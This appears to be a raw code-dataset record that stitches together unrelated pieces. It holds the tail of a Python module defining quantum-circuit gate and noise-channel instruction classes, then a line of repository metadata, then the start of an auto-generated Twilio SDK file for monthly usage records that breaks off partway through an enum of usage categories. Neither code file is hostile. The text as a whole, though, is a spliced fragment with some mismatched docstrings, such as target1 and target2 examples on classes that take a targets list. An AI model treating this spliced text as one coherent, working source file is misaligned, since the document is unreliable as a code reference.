>>> CV(control=0, target=1)
"""
class Type(str, Enum):
cv = "cv"
type = Type.cv
class CY(SingleTarget, SingleControl):
"""
Controlled Y-gate.
Attributes:
type (str): The instruction type. default = "cy". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CY(control=0, target=1)
"""
class Type(str, Enum):
cy = "cy"
type = Type.cy
class CZ(SingleTarget, SingleControl):
"""
Controlled Z-gate.
Attributes:
type (str): The instruction type. default = "cz". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CZ(control=0, target=1)
"""
class Type(str, Enum):
cz = "cz"
type = Type.cz
class XX(DoubleTarget, Angle):
"""
The Ising (XX) gate.
Attributes:
type (str): The instruction type. default = "xx". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> XX(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
xx = "xx"
type = Type.xx
class YY(DoubleTarget, Angle):
"""
The Ising (YY) gate.
Attributes:
type (str): The instruction type. default = "yy". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> YY(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
yy = "yy"
type = Type.yy
class ZZ(DoubleTarget, Angle):
"""
The Ising (ZZ) gate.
Attributes:
type (str): The instruction type. default = "zz". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> ZZ(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
zz = "zz"
type = Type.zz
class V(SingleTarget):
"""
Square root of NOT gate.
Attributes:
type (str): The instruction type. default = "v". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> V(target=0)
"""
class Type(str, Enum):
v = "v"
type = Type.v
class Vi(SingleTarget):
"""
Conjugate transpose of square root of NOT gate.
Attributes:
type (str): The instruction type. default = "vi". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Vi(target=0)
"""
class Type(str, Enum):
vi = "vi"
type = Type.vi
class Unitary(TwoDimensionalMatrix, MultiTarget):
"""
Arbitrary unitary matrix gate
Attributes:
type (str): The instruction type. default = "unitary". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits. This is a list with ints and all ints >= 0.
matrix (List[List[List[float]]]): The unitary matrix specifying the behavior of the gate.
Examples:
>>> Unitary(targets=[0], matrix=[[[0, 0], [1, 0]],[[1, 0], [0, 1]]])
"""
class Type(str, Enum):
unitary = "unitary"
type = Type.unitary
class BitFlip(SingleTarget, SingleProbability):
"""
Bit Flip noise channel.
Attributes:
type (str): The instruction type. default = "bit_flip". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> BitFlip(target=1, probability=0.1)
"""
class Type(str, Enum):
bit_flip = "bit_flip"
type = Type.bit_flip
class PhaseFlip(SingleTarget, SingleProbability):
"""
Phase Flip noise channel.
Attributes:
type (str): The instruction type. default = "phase_flip". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseFlip(target=1, probability=0.1)
"""
class Type(str, Enum):
phase_flip = "phase_flip"
type = Type.phase_flip
class PauliChannel(SingleTarget, TripleProbability):
"""
A single qubit Pauli noise channel.
Attributes:
type (str): The instruction type. default = "pauli_channel". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PauliChannel(target=1, probX=0.1, probY=0.2, probZ=0.3)
"""
class Type(str, Enum):
pauli_channel = "pauli_channel"
type = Type.pauli_channel
class MultiQubitPauliChannel(DoubleTarget, MultiProbability):
"""
Multi-qubit Pauli noise channel.
Attributes:
type (str): The instruction type. default = "multi_qubit_pauli_channel". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit(s). This is list of intergers >= 0.
The length of the list must match the length of the Pauli strings provided.
Examples:
>>> MultiQubitPauliChannel(target=1, probabilities={"X": 0.1})
>>> MultiQubitPauliChannel(target=[0,1], probabilities={"XY": 0.1})
>>> MultiQubitPauliChannel(target=[0,1,2], probabilities={"XYZ": 0.1})
"""
class Type(str, Enum):
multi_qubit_pauli_channel = "multi_qubit_pauli_channel"
type = Type.multi_qubit_pauli_channel
class Depolarizing(SingleTarget, SingleProbability_34):
"""
Depolarizing noise channel.
Attributes:
type (str): The instruction type. default = "depolarizing". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Depolarizing(target=1, probability=0.1)
"""
class Type(str, Enum):
depolarizing = "depolarizing"
type = Type.depolarizing
class TwoQubitDepolarizing(DoubleTarget, SingleProbability_1516):
"""
Two-Qubit Depolarizing noise channel.
Attributes:
type (str): The instruction type. default = "two_qubit_depolarizing".
(type) is optional. This should be unique among all instruction types.
target (int): The target qubits. This is an int >= 0.
Examples:
>>> TwoQubitDepolarizing(target1=0, target2=1, probability=0.1)
"""
class Type(str, Enum):
two_qubit_depolarizing = "two_qubit_depolarizing"
type = Type.two_qubit_depolarizing
class TwoQubitDephasing(DoubleTarget, SingleProbability_34):
"""
Two-Qubit Dephasing noise channel.
Attributes:
type (str): The instruction type. default = "two_qubit_dephasing".
(type) is optional. This should be unique among all instruction types.
target (int): The target qubits. This is an int >= 0.
Examples:
>>> TwoQubitDephasing(target1=0, target2=1, probability=0.1)
"""
class Type(str, Enum):
two_qubit_dephasing = "two_qubit_dephasing"
type = Type.two_qubit_dephasing
class AmplitudeDamping(SingleTarget, DampingProbability):
"""
Amplitude Damping noise channel.
Attributes:
type (str): The instruction type. default = "amplitude_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> AmplitudeDamping(target=1, gamma=0.1)
"""
class Type(str, Enum):
amplitude_damping = "amplitude_damping"
type = Type.amplitude_damping
class GeneralizedAmplitudeDamping(SingleTarget, DampingProbability, DampingSingleProbability):
"""
Generalized Amplitude Damping noise channel.
Attributes:
type (str): The instruction type. default = "generalized_amplitude_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> GeneralizedAmplitudeDamping(target=1, gamma=0.1, probability=0.9)
"""
class Type(str, Enum):
generalized_amplitude_damping = "generalized_amplitude_damping"
type = Type.generalized_amplitude_damping
class PhaseDamping(SingleTarget, DampingProbability):
"""
Phase Damping noise channel.
Attributes:
type (str): The instruction type. default = "phase_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseDamping(target=1, gamma=0.1)
"""
class Type(str, Enum):
phase_damping = "phase_damping"
type = Type.phase_damping
class Kraus(TwoDimensionalMatrixList, MultiTarget):
"""
Arbitrary quantum channel defined by the input matrices.
Attributes:
type (str): The instruction type. default = "kraus". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits. This is a list with ints and all ints >= 0.
matrices (List[List[List[List[float]]]]): A list of matrices specifying
the quantum channel. A complex number is represented as a list of 2
real numbers. So each matrix has type List[List[List[float]]].
Examples:
>>> matrix1 = [[[1/sqrt(2), 0],[0, 0]],[[0, 0],[1/sqrt(2), 0]]]
>>> matrix2 = [[[0, 0],[1/sqrt(2), 0]],[[1/sqrt(2), 0],[0, 0]]]
>>> matrices = [matrix1, matrix2]
>>> Kraus(targets=[0], matrices=matrices)
"""
class Type(str, Enum):
kraus = "kraus"
type = Type.kraus
class StartVerbatimBox(CompilerDirective):
"""
StartVerbatimBox is a compiler instruction to start a portion of code that
will preserve the instruction within StartVerbatimBox and EndVerbatimBox
from being modified in any way by the compiler.
Attributes:
type (str): The instruction type. default = "start_verbatim_box". (type) is optional.
This should be unique among all instruction types.
Examples:
>>> StartVerbatimBox()
"""
class Type(str, Enum):
start_verbatim_box = "start_verbatim_box"
type = Type.start_verbatim_box
directive: str = "StartVerbatimBox"
class EndVerbatimBox(CompilerDirective):
"""
EndVerbatimBox is a compiler instruction to mark the end of a portion of code
that preserves the instruction within StartVerbatimBox and EndVerbatimBox
from being modified in any way by the compiler.
Attributes:
type (str): The instruction type. default = "end_verbatim_box". (type) is optional.
This should be unique among all instruction types.
Examples:
>>> EndVerbatimBox()
"""
class Type(str, Enum):
end_verbatim_box = "end_verbatim_box"
type = Type.end_verbatim_box
directive: str = "EndVerbatimBox"
| 27.251515 | 98 | 0.614367 |
ec48e76649d48f6f96741d44e222932b0549cc23 | 28,305 | py | Python | aws_deploy_package/twilio/rest/api/v2010/account/usage/record/this_month.py | anandhakrishnanh1998/Twilio-Chat-Bot | bb5cb02e363deb4c31a24cae6b0fd0b893ef2e20 | [
"MIT"
] | null | null | null | aws_deploy_package/twilio/rest/api/v2010/account/usage/record/this_month.py | anandhakrishnanh1998/Twilio-Chat-Bot | bb5cb02e363deb4c31a24cae6b0fd0b893ef2e20 | [
"MIT"
] | 9 | 2019-12-05T00:49:12.000Z | 2021-09-08T01:31:25.000Z | flask/lib/python3.6/site-packages/twilio/rest/api/v2010/account/usage/record/this_month.py | JOFLIX/grapevines | 34576e01184570d79cc140b42ffb71d322132da6 | [
"MIT",
"Unlicense"
] | null | null | null | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class ThisMonthList(ListResource):
""" """
def __init__(self, version, account_sid):
"""
Initialize the ThisMonthList
:param Version version: Version that contains the resource
:param account_sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthList
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthList
"""
super(ThisMonthList, self).__init__(version)
# Path Solution
self._solution = {'account_sid': account_sid, }
self._uri = '/Accounts/{account_sid}/Usage/Records/ThisMonth.json'.format(**self._solution)
def stream(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset, limit=None,
page_size=None):
"""
Streams ThisMonthInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param ThisMonthInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date
:param date end_date: Only include usage that occurred on or before this date
:param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
category=category,
start_date=start_date,
end_date=end_date,
include_subaccounts=include_subaccounts,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset, limit=None,
page_size=None):
"""
Lists ThisMonthInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param ThisMonthInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date
:param date end_date: Only include usage that occurred on or before this date
:param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance]
"""
return list(self.stream(
category=category,
start_date=start_date,
end_date=end_date,
include_subaccounts=include_subaccounts,
limit=limit,
page_size=page_size,
))
def page(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset,
page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of ThisMonthInstance records from the API.
Request is executed immediately
:param ThisMonthInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date
:param date end_date: Only include usage that occurred on or before this date
:param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of ThisMonthInstance
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthPage
"""
params = values.of({
'Category': category,
'StartDate': serialize.iso8601_date(start_date),
'EndDate': serialize.iso8601_date(end_date),
'IncludeSubaccounts': include_subaccounts,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return ThisMonthPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of ThisMonthInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of ThisMonthInstance
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return ThisMonthPage(self._version, response, self._solution)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.ThisMonthList>'
class ThisMonthPage(Page):
""" """
def __init__(self, version, response, solution):
"""
Initialize the ThisMonthPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param account_sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthPage
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthPage
"""
super(ThisMonthPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of ThisMonthInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance
"""
return ThisMonthInstance(self._version, payload, account_sid=self._solution['account_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.ThisMonthPage>'
class ThisMonthInstance(InstanceResource):
""" """
class Category(object):
AGENT_CONFERENCE = "agent-conference"
ANSWERING_MACHINE_DETECTION = "answering-machine-detection"
AUTHY_AUTHENTICATIONS = "authy-authentications"
AUTHY_CALLS_OUTBOUND = "authy-calls-outbound"
AUTHY_MONTHLY_FEES = "authy-monthly-fees"
AUTHY_PHONE_INTELLIGENCE = "authy-phone-intelligence"
AUTHY_PHONE_VERIFICATIONS = "authy-phone-verifications"
AUTHY_SMS_OUTBOUND = "authy-sms-outbound"
CALL_PROGESS_EVENTS = "call-progess-events"
CALLERIDLOOKUPS = "calleridlookups"
CALLS = "calls"
CALLS_CLIENT = "calls-client"
CALLS_GLOBALCONFERENCE = "calls-globalconference"
CALLS_INBOUND = "calls-inbound"
CALLS_INBOUND_LOCAL = "calls-inbound-local"
CALLS_INBOUND_MOBILE = "calls-inbound-mobile"
CALLS_INBOUND_TOLLFREE = "calls-inbound-tollfree"
CALLS_OUTBOUND = "calls-outbound"
CALLS_PAY_VERB_TRANSACTIONS = "calls-pay-verb-transactions"
CALLS_RECORDINGS = "calls-recordings"
CALLS_SIP = "calls-sip"
CALLS_SIP_INBOUND = "calls-sip-inbound"
CALLS_SIP_OUTBOUND = "calls-sip-outbound"
CARRIER_LOOKUPS = "carrier-lookups"
CONVERSATIONS = "conversations"
CONVERSATIONS_API_REQUESTS = "conversations-api-requests"
CONVERSATIONS_CONVERSATION_EVENTS = "conversations-conversation-events"
CONVERSATIONS_ENDPOINT_CONNECTIVITY = "conversations-endpoint-connectivity"
CONVERSATIONS_EVENTS = "conversations-events"
CONVERSATIONS_PARTICIPANT_EVENTS = "conversations-participant-events"
CONVERSATIONS_PARTICIPANTS = "conversations-participants"
CPS = "cps"
FRAUD_LOOKUPS = "fraud-lookups"
GROUP_ROOMS = "group-rooms"
GROUP_ROOMS_DATA_TRACK = "group-rooms-data-track"
GROUP_ROOMS_ENCRYPTED_MEDIA_RECORDED = "group-rooms-encrypted-media-recorded"
GROUP_ROOMS_MEDIA_DOWNLOADED = "group-rooms-media-downloaded"
GROUP_ROOMS_MEDIA_RECORDED = "group-rooms-media-recorded"
GROUP_ROOMS_MEDIA_ROUTED = "group-rooms-media-routed"
GROUP_ROOMS_MEDIA_STORED = "group-rooms-media-stored"
GROUP_ROOMS_PARTICIPANT_MINUTES = "group-rooms-participant-minutes"
GROUP_ROOMS_RECORDED_MINUTES = "group-rooms-recorded-minutes"
IP_MESSAGING = "ip-messaging"
IP_MESSAGING_COMMANDS = "ip-messaging-commands"
IP_MESSAGING_DATA_STORAGE = "ip-messaging-data-storage"
IP_MESSAGING_DATA_TRANSFER = "ip-messaging-data-transfer"
IP_MESSAGING_ENDPOINT_CONNECTIVITY = "ip-messaging-endpoint-connectivity"
LOOKUPS = "lookups"
MARKETPLACE = "marketplace"
MARKETPLACE_ALGORITHMIA_NAMED_ENTITY_RECOGNITION = "marketplace-algorithmia-named-entity-recognition"
MARKETPLACE_DIGITAL_SEGMENT_BUSINESS_INFO = "marketplace-digital-segment-business-info"
MARKETPLACE_GOOGLE_SPEECH_TO_TEXT = "marketplace-google-speech-to-text"
MARKETPLACE_IBM_WATSON_MESSAGE_INSIGHTS = "marketplace-ibm-watson-message-insights"
MARKETPLACE_IBM_WATSON_MESSAGE_SENTIMENT = "marketplace-ibm-watson-message-sentiment"
MARKETPLACE_IBM_WATSON_RECORDING_ANALYSIS = "marketplace-ibm-watson-recording-analysis"
MARKETPLACE_ICEHOOK_SYSTEMS_SCOUT = "marketplace-icehook-systems-scout"
MARKETPLACE_INFOGROUP_DATAAXLE_BIZINFO = "marketplace-infogroup-dataaxle-bizinfo"
MARKETPLACE_CADENCE_TRANSCRIPTION = "marketplace-cadence-transcription"
MARKETPLACE_CADENCE_TRANSLATION = "marketplace-cadence-translation"
MARKETPLACE_CAPIO_SPEECH_TO_TEXT = "marketplace-capio-speech-to-text"
MARKETPLACE_FACEBOOK_OFFLINE_CONVERSIONS = "marketplace-facebook-offline-conversions"
MARKETPLACE_KEEN_IO_CONTACT_CENTER_ANALYTICS = "marketplace-keen-io-contact-center-analytics"
MARKETPLACE_MARCHEX_CLEANCALL = "marketplace-marchex-cleancall"
MARKETPLACE_MARCHEX_SENTIMENT_ANALYSIS_FOR_SMS = "marketplace-marchex-sentiment-analysis-for-sms"
MARKETPLACE_MARKETPLACE_NEXTCALLER_SOCIAL_ID = "marketplace-marketplace-nextcaller-social-id"
MARKETPLACE_MOBILE_COMMONS_OPT_OUT_CLASSIFIER = "marketplace-mobile-commons-opt-out-classifier"
MARKETPLACE_NEXIWAVE_VOICEMAIL_TO_TEXT = "marketplace-nexiwave-voicemail-to-text"
MARKETPLACE_NEXTCALLER_ADVANCED_CALLER_IDENTIFICATION = "marketplace-nextcaller-advanced-caller-identification"
MARKETPLACE_NOMOROBO_SPAM_SCORE = "marketplace-nomorobo-spam-score"
MARKETPLACE_PAYFONE_TCPA_COMPLIANCE = "marketplace-payfone-tcpa-compliance"
MARKETPLACE_TELO_OPENCNAM = "marketplace-telo-opencnam"
MARKETPLACE_TRUECNAM_TRUE_SPAM = "marketplace-truecnam-true-spam"
MARKETPLACE_TWILIO_CALLER_NAME_LOOKUP_US = "marketplace-twilio-caller-name-lookup-us"
MARKETPLACE_TWILIO_CARRIER_INFORMATION_LOOKUP = "marketplace-twilio-carrier-information-lookup"
MARKETPLACE_VOICEBASE_PCI = "marketplace-voicebase-pci"
MARKETPLACE_VOICEBASE_TRANSCRIPTION = "marketplace-voicebase-transcription"
MARKETPLACE_WHITEPAGES_PRO_CALLER_IDENTIFICATION = "marketplace-whitepages-pro-caller-identification"
MARKETPLACE_WHITEPAGES_PRO_PHONE_INTELLIGENCE = "marketplace-whitepages-pro-phone-intelligence"
MARKETPLACE_WHITEPAGES_PRO_PHONE_REPUTATION = "marketplace-whitepages-pro-phone-reputation"
MARKETPLACE_WOLFRAM_SHORT_ANSWER = "marketplace-wolfram-short-answer"
MARKETPLACE_WOLFARM_SPOKEN_RESULTS = "marketplace-wolfarm-spoken-results"
MARKETPLACE_DEEPGRAM_PHRASE_DETECTOR = "marketplace-deepgram-phrase-detector"
MARKETPLACE_CONVRIZA_ABABA = "marketplace-convriza-ababa"
MARKETPLACE_IBM_WATSON_TONE_ANALYZER = "marketplace-ibm-watson-tone-analyzer"
MARKETPLACE_REMEETING_AUTOMATIC_SPEECH_RECOGNITION = "marketplace-remeeting-automatic-speech-recognition"
MARKETPLACE_TCPA_DEFENSE_SOLUTIONS_BLACKLIST_FEED = "marketplace-tcpa-defense-solutions-blacklist-feed"
MARKETPLACE_VOICEBASE_TRANSCRIPTION_CUSTOM_VOCABULARY = "marketplace-voicebase-transcription-custom-vocabulary"
MARKETPLACE_YTICA_CONTACT_CENTER_REPORTING_ANALYTICS = "marketplace-ytica-contact-center-reporting-analytics"
MEDIASTORAGE = "mediastorage"
MMS = "mms"
MMS_INBOUND = "mms-inbound"
MMS_INBOUND_LONGCODE = "mms-inbound-longcode"
MMS_INBOUND_SHORTCODE = "mms-inbound-shortcode"
MMS_OUTBOUND = "mms-outbound"
MMS_OUTBOUND_LONGCODE = "mms-outbound-longcode"
MMS_OUTBOUND_SHORTCODE = "mms-outbound-shortcode"
MONITOR_READS = "monitor-reads"
MONITOR_STORAGE = "monitor-storage"
MONITOR_WRITES = "monitor-writes"
NOTIFY = "notify"
NOTIFY_ACTIONS_ATTEMPTS = "notify-actions-attempts"
NOTIFY_CHANNELS = "notify-channels"
NUMBER_FORMAT_LOOKUPS = "number-format-lookups"
PCHAT = "pchat"
PCHAT_ACTIONS = "pchat-actions"
PCHAT_APS = "pchat-aps"
PCHAT_NOTIFICATIONS = "pchat-notifications"
PCHAT_READS = "pchat-reads"
PCHAT_USERS = "pchat-users"
PCHAT_MESSAGES = "pchat-messages"
PEER_TO_PEER_ROOMS_PARTICIPANT_MINUTES = "peer-to-peer-rooms-participant-minutes"
PFAX = "pfax"
PFAX_MINUTES = "pfax-minutes"
PFAX_MINUTES_INBOUND = "pfax-minutes-inbound"
PFAX_MINUTES_OUTBOUND = "pfax-minutes-outbound"
PFAX_PAGES = "pfax-pages"
PHONENUMBERS = "phonenumbers"
PHONENUMBERS_CPS = "phonenumbers-cps"
PHONENUMBERS_EMERGENCY = "phonenumbers-emergency"
PHONENUMBERS_LOCAL = "phonenumbers-local"
PHONENUMBERS_MOBILE = "phonenumbers-mobile"
PHONENUMBERS_SETUPS = "phonenumbers-setups"
PHONENUMBERS_TOLLFREE = "phonenumbers-tollfree"
PREMIUMSUPPORT = "premiumsupport"
PROXY = "proxy"
PROXY_ACTIVE_SESSIONS = "proxy-active-sessions"
PV = "pv"
PV_COMPOSITION_MEDIA_DOWNLOADED = "pv-composition-media-downloaded"
PV_COMPOSITION_MEDIA_ENCRYPTED = "pv-composition-media-encrypted"
PV_COMPOSITION_MEDIA_STORED = "pv-composition-media-stored"
PV_COMPOSITION_MINUTES = "pv-composition-minutes"
PV_RECORDING_COMPOSITIONS = "pv-recording-compositions"
PV_ROOM_PARTICIPANTS = "pv-room-participants"
PV_ROOM_PARTICIPANTS_AU1 = "pv-room-participants-au1"
PV_ROOM_PARTICIPANTS_BR1 = "pv-room-participants-br1"
PV_ROOM_PARTICIPANTS_IE1 = "pv-room-participants-ie1"
PV_ROOM_PARTICIPANTS_JP1 = "pv-room-participants-jp1"
PV_ROOM_PARTICIPANTS_SG1 = "pv-room-participants-sg1"
PV_ROOM_PARTICIPANTS_US1 = "pv-room-participants-us1"
PV_ROOM_PARTICIPANTS_US2 = "pv-room-participants-us2"
PV_ROOMS = "pv-rooms"
PV_SIP_ENDPOINT_REGISTRATIONS = "pv-sip-endpoint-registrations"
RECORDINGS = "recordings"
RECORDINGSTORAGE = "recordingstorage"
ROOMS_GROUP_MINUTES = "rooms-group-minutes"
ROOMS_GROUP_BANDWIDTH = "rooms-group-bandwidth"
ROOMS_PEER_TO_PEER_MINUTES = "rooms-peer-to-peer-minutes"
SHORTCODES = "shortcodes"
SHORTCODES_CUSTOMEROWNED = "shortcodes-customerowned"
SHORTCODES_MMS_ENABLEMENT = "shortcodes-mms-enablement"
SHORTCODES_MPS = "shortcodes-mps"
SHORTCODES_RANDOM = "shortcodes-random"
SHORTCODES_UK = "shortcodes-uk"
SHORTCODES_VANITY = "shortcodes-vanity"
SMALL_GROUP_ROOMS = "small-group-rooms"
SMALL_GROUP_ROOMS_DATA_TRACK = "small-group-rooms-data-track"
SMALL_GROUP_ROOMS_PARTICIPANT_MINUTES = "small-group-rooms-participant-minutes"
SMS = "sms"
SMS_INBOUND = "sms-inbound"
SMS_INBOUND_LONGCODE = "sms-inbound-longcode"
SMS_INBOUND_SHORTCODE = "sms-inbound-shortcode"
SMS_OUTBOUND = "sms-outbound"
SMS_OUTBOUND_CONTENT_INSPECTION = "sms-outbound-content-inspection"
SMS_OUTBOUND_LONGCODE = "sms-outbound-longcode"
SMS_OUTBOUND_SHORTCODE = "sms-outbound-shortcode"
SMS_MESSAGES_FEATURES = "sms-messages-features"
SMS_MESSAGES_FEATURES_SENDERID = "sms-messages-features-senderid"
SPEECH_RECOGNITION = "speech-recognition"
STUDIO_ENGAGEMENTS = "studio-engagements"
SYNC = "sync"
SYNC_ACTIONS = "sync-actions"
SYNC_ENDPOINT_HOURS = "sync-endpoint-hours"
SYNC_ENDPOINT_HOURS_ABOVE_DAILY_CAP = "sync-endpoint-hours-above-daily-cap"
TASKROUTER_TASKS = "taskrouter-tasks"
TOTALPRICE = "totalprice"
TRANSCRIPTIONS = "transcriptions"
TRUNKING_CPS = "trunking-cps"
TRUNKING_EMERGENCY_CALLS = "trunking-emergency-calls"
TRUNKING_ORIGINATION = "trunking-origination"
TRUNKING_ORIGINATION_LOCAL = "trunking-origination-local"
TRUNKING_ORIGINATION_MOBILE = "trunking-origination-mobile"
TRUNKING_ORIGINATION_TOLLFREE = "trunking-origination-tollfree"
TRUNKING_RECORDINGS = "trunking-recordings"
TRUNKING_SECURE = "trunking-secure"
TRUNKING_TERMINATION = "trunking-termination"
TURNMEGABYTES = "turnmegabytes"
TURNMEGABYTES_AUSTRALIA = "turnmegabytes-australia"
TURNMEGABYTES_BRASIL = "turnmegabytes-brasil"
TURNMEGABYTES_GERMANY = "turnmegabytes-germany"
TURNMEGABYTES_INDIA = "turnmegabytes-india"
TURNMEGABYTES_IRELAND = "turnmegabytes-ireland"
TURNMEGABYTES_JAPAN = "turnmegabytes-japan"
TURNMEGABYTES_SINGAPORE = "turnmegabytes-singapore"
TURNMEGABYTES_USEAST = "turnmegabytes-useast"
TURNMEGABYTES_USWEST = "turnmegabytes-uswest"
TWILIO_INTERCONNECT = "twilio-interconnect"
VIDEO_RECORDINGS = "video-recordings"
VOICE_INSIGHTS = "voice-insights"
VOICE_INSIGHTS_CLIENT_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-client-insights-on-demand-minute"
VOICE_INSIGHTS_PTSN_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-ptsn-insights-on-demand-minute"
VOICE_INSIGHTS_SIP_INTERFACE_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-sip-interface-insights-on-demand-minute"
VOICE_INSIGHTS_SIP_TRUNKING_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-sip-trunking-insights-on-demand-minute"
WIRELESS = "wireless"
WIRELESS_ORDERS = "wireless-orders"
WIRELESS_ORDERS_ARTWORK = "wireless-orders-artwork"
WIRELESS_ORDERS_BULK = "wireless-orders-bulk"
WIRELESS_ORDERS_ESIM = "wireless-orders-esim"
WIRELESS_ORDERS_STARTER = "wireless-orders-starter"
WIRELESS_USAGE = "wireless-usage"
WIRELESS_USAGE_COMMANDS = "wireless-usage-commands"
WIRELESS_USAGE_COMMANDS_AFRICA = "wireless-usage-commands-africa"
WIRELESS_USAGE_COMMANDS_ASIA = "wireless-usage-commands-asia"
WIRELESS_USAGE_COMMANDS_CENTRALANDSOUTHAMERICA = "wireless-usage-commands-centralandsouthamerica"
WIRELESS_USAGE_COMMANDS_EUROPE = "wireless-usage-commands-europe"
WIRELESS_USAGE_COMMANDS_HOME = "wireless-usage-commands-home"
WIRELESS_USAGE_COMMANDS_NORTHAMERICA = "wireless-usage-commands-northamerica"
WIRELESS_USAGE_COMMANDS_OCEANIA = "wireless-usage-commands-oceania"
WIRELESS_USAGE_COMMANDS_ROAMING = "wireless-usage-commands-roaming"
WIRELESS_USAGE_DATA = "wireless-usage-data"
WIRELESS_USAGE_DATA_AFRICA = "wireless-usage-data-africa"
WIRELESS_USAGE_DATA_ASIA = "wireless-usage-data-asia"
WIRELESS_USAGE_DATA_CENTRALANDSOUTHAMERICA = "wireless-usage-data-centralandsouthamerica"
WIRELESS_USAGE_DATA_CUSTOM_ADDITIONALMB = "wireless-usage-data-custom-additionalmb"
WIRELESS_USAGE_DATA_CUSTOM_FIRST5MB = "wireless-usage-data-custom-first5mb"
